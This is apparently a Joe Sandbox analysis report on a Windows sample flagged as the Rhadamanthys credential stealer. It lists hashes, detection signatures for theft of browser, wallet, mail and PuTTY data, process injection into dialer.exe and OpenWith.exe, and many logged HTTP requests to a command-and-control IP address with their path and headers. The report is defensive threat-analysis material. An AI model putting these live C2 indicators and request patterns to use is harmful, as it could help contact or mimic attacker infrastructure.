Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wdeeFKntav.exe

Overview

General Information

Sample name:wdeeFKntav.exe
renamed because original name is a hash value
Original sample name:e1bece7ba20dbb8100100f8cff2c415d.exe
Analysis ID:1446715
MD5:e1bece7ba20dbb8100100f8cff2c415d
SHA1:6ea8efc12ed24f00eb0f230dfec026a6816ba696
SHA256:98942a0affa9721c90b097c2c6a9cd02959185526c3b7a44377a25b252a16fff
Tags:exe
Infos:

Detection

RHADAMANTHYS
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • wdeeFKntav.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\wdeeFKntav.exe" MD5: E1BECE7BA20DBB8100100F8CFF2C415D)
    • dialer.exe (PID: 3544 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)
      • OpenWith.exe (PID: 1880 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.2114030735.0000000002B90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000000.00000003.2110064787.0000000000D60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.3.wdeeFKntav.exe.45c0000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              2.3.dialer.exe.4fd0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                2.3.dialer.exe.4db0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  0.3.wdeeFKntav.exe.47e0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    2.3.dialer.exe.4fd0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: wdeeFKntav.exeAvira: detected
                      Multi AV Scanner detection for submitted file
                      Source: wdeeFKntav.exeReversingLabs: Detection: 76%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Machine Learning detection for sample
                      Source: wdeeFKntav.exeJoe Sandbox ML: detected
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F04FF7C CryptUnprotectData,3_2_00007DF41F04FF7C
                      Source: wdeeFKntav.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49699 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49713 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49718 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49720 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49721 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.156.8.232:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: wdeeFKntav.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831L source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2111775317.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112323721.00000000047B0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114700103.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2114865216.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: wdeeFKntav.exe, 00000000.00000003.2112545924.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112684749.0000000004760000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115217738.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115079095.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2113091379.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2113264458.00000000047E0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115786172.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115566580.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: wdeeFKntav.exe, 00000000.00000003.2112932104.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, wdeeFKntav.exe, 00000000.00000003.2112870082.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115365389.0000000002D10000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000002.00000003.2115429018.0000000004E30000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbf source: OpenWith.exe, 00000003.00000002.3331408408.0000025B14E9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F058E20 GetLogicalDriveStringsW,3_2_00007DF41F058E20
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppDataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\DefaultJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStoreJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalizationJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\LocalJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\Default\AppData\Local\MicrosoftJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeCode function: 4x nop then dec esp3_2_0000025B14E20511
                      Source: C:\Windows\System32\OpenWith.exeCode function: 4x nop then dec esp3_2_00007DF41F05BFA1
                      Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="Connection: close
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: xU2b84xhXZbqQYI
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: RAgFd01qjbFHl5s
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: sW1tFC9u4h8HrYr
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: M8ftLICEWZ7XZ6c
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Uu0iaFdbG5AryZb
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: wmg987RLpbyqFSI
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: YpfXF0WYwZtHMSW
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: gBYpLgo7UasXiuG
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: TYefaI1F0MWWonG
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: 2ku58F9dUSVrZha
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: kvd5dMCTf5mbuop
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: EbWxOS52DLQr2vF
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: f5cmLiHAmSPq8o0
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: oqscagi87YhXdh9
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: IDbbhmNh0FLcLVU
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.232
                      Source: C:\Windows\System32\OpenWith.exeCode function: 3_2_00007DF41F081950 WSARecv,3_2_00007DF41F081950
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="Connection: close
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: xU2b84xhXZbqQYI
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: RAgFd01qjbFHl5s
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: sW1tFC9u4h8HrYr
                      Source: global trafficHTTP traffic detected: GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1Host: 94.156.8.232Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: M8ftLICEWZ7XZ6c
